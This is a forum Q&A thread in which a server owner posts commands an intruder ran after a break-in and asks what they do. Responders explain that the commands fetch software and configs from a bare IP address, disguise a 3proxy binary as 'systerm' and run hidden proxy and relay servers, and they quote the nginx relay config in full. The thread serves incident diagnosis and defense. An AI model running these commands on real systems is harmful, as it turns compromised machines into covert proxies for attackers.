Command explanation

Somebody hacked my private server and i found below command form the command line history. Can any body explain what is this means?

1. wget http://sysoev.ru/nginx/nginx-0.7.64.tar.gz && tar zxf nginx-0.7.64.tar.gz && cd nginx-0.7.64 && ./configure --without-http_gzip_module --with-http_stub_status_module --without-http-cache ; make install && cd ../ && rm -fr ngi* && wget 94.75.210.13/nsm3.conf -O /usr/local/nginx/conf/nginx.conf && env -i /usr/local/nginx/sbin/nginx

and

2. wget 94.75.210.13/3proxy-0.6.tgz && tar zxf 3proxy-0.6.tgz && cd 3proxy-0.6 && make -f Makefile.Linux && mv src/proxy /usr/local/bin/systerm && cd ../ && rm -fr 3prox* && wget 94.75.210.13/3proxy.cfg -O /usr/local/etc/3proxy.cfg && env -i /usr/local/bin/systerm -p63222 &94.75.210.13/3proxy-0.6.tgz && tar zxf 3proxy-0.6.tgz && cd 3proxy-0.6 && make -f Makefile.Linux && mv src/proxy /usr/local/bin/systerm && cd ../ && rm -fr 3prox* && wget 94.75.210.13/3proxy.cfg -O /usr/local/etc/3proxy.cfg && env -i /usr/local/bin/systerm -p63222 &

Mithun Sreedharan

Posted 2010-01-11T08:42:00.070

Reputation: 1 485

3To be honest, one who has his own private server should at least know the meaning of 'wget' and 'tar'. – user1686 – 2010-01-11T13:08:25.060

1To agree with the previous comment: from your comments here, you don't seem to have even a very basic idea of how to run a server or how to secure a server. You should shut it down and use a server that is run professionally. Odds are your own server is being used right now by either a spammer or a malware-spreader. Running a server badly is bad citizenship. – CarlF – 2010-01-11T15:10:07.403

1@CarlF: I both agree and disagree with you. I agree because running a server badly let one become a potential accomplice of some villain; I disagree because if Mithun will keep on trying, breaking and fixing he will learn. @Mithun: On the other hand...RTFM FIRTS! :D – dag729 – 2010-01-11T15:39:13.010

@dag729, I hope you're right, but ... someone who can't even type "man wget"? Wrong attitude. – CarlF – 2010-01-12T02:16:13.270

I know what the wget, tar and man are but nothing about the nginx and 3proxy, i just want to know what the intruder was actually trying to achieve – Mithun Sreedharan – 2010-01-12T03:37:07.590

Answers

Someone apparently downloaded and installed nginx (a webserver) and 3proxy (a proxy server).

So I guess your server is used now as an intermediate proxy by the hackers. Uninstalling and removing those servers would be the best course of action me things. (in addition to tightening up your security of course ;-)

fretje

Posted 2010-01-11T08:42:00.070

Reputation: 10 524

4After removing those server processes and other changes you know about, I usually recommend backing up any data and rebuilding the server. It is the only way to be absolutely sure that no other holes have been left open by the invaders that they can use to get back in easily later. – David Spillett – 2010-01-11T09:08:13.137

I don't have an option to roll back, thinking of uninstalling nginx and 3proxy – Mithun Sreedharan – 2010-01-11T11:41:44.340

"I don't have an option to roll back, thinking of uninstalling nginx and 3proxy": but if someone was able to use wget, tar, configure and make install, one or more of your accounts with those permission are compromised. I would disable the root account and remove any superuser permission to any other user but the very administrator. – dag729 – 2010-01-11T15:01:07.167

Also, another good comeback, could be to just change "access_log off" and try to retrieve informations about the cracker: than kick him in the ass! :D – dag729 – 2010-01-11T15:03:21.970

last command is disabled – Mithun Sreedharan – 2010-01-12T03:38:03.127

It is trying to install a webserver, and a proxy with the following settings:

user www-data; 

worker_processes 2; 

error_log logs/error.log notice; 

worker_rlimit_nofile 10240; 

events { worker_connections 8192; use epoll; } 

http {

  include mime.types;

  access_log off;

  sendfile on;

  tcp_nopush on;

  tcp_nodelay on;

  keepalive_timeout 0;

  server_tokens off;

  server_names_hash_bucket_size 64;

  #//G

  deny 64.233.160.0/19;

  deny 66.102.0.0/20;

  deny 66.249.64.0/19;

  deny 72.14.192.0/18;

  deny 74.125.0.0/16;

  deny 89.207.224.0/24;

  deny 193.142.125.0/24;

  deny 194.110.194.0/24;

  deny 209.85.128.0/17;

  deny 216.239.32.0/19;

  server {

      listen 8080;

      location ~* ^.+\.(gif|png|jpg)$ {

        root /var/tmp/$host;

        error_page 404 = @fetch;

      }

location @fetch {

    internal;

      proxy_pass http://serverparkhosting.com:4480;

      proxy_redirect off;

      proxy_ignore_client_abort on;

      proxy_set_header X-Real-IP $remote_addr;

      proxy_set_header Host $host;

      proxy_buffers 400 50k;

      proxy_read_timeout 300;

      proxy_send_timeout 300;

      proxy_store /var/tmp/$host/$uri;

      proxy_store_access user:rw group:rw all:r;

      root /var/tmp/$host;

}



    location / {

      proxy_pass http://serverparkhosting.com:4480;

      proxy_redirect off;

      proxy_ignore_client_abort on;

      proxy_set_header X-Real-IP $remote_addr;

      proxy_set_header Host $host;

      proxy_buffers 100 50k;

      proxy_read_timeout 300;

      proxy_send_timeout 300;

    }

        location = /info { stub_status on; }

  }

}

William Hilsum

Posted 2010-01-11T08:42:00.070

Reputation: 111 572

Can you please explain what does that proxy used? – Mithun Sreedharan – 2010-01-11T10:48:34.900

As others have said, your server has been compromised by someone else. Once you have recovered either by removing and/or reinstalling, you should seriously consider implementing a very base-line security. A good place to start are the security manuals of your linux distribution and maybe something like the tiger scripts.

Frank Kalis

Posted 2010-01-11T08:42:00.070

Reputation: 121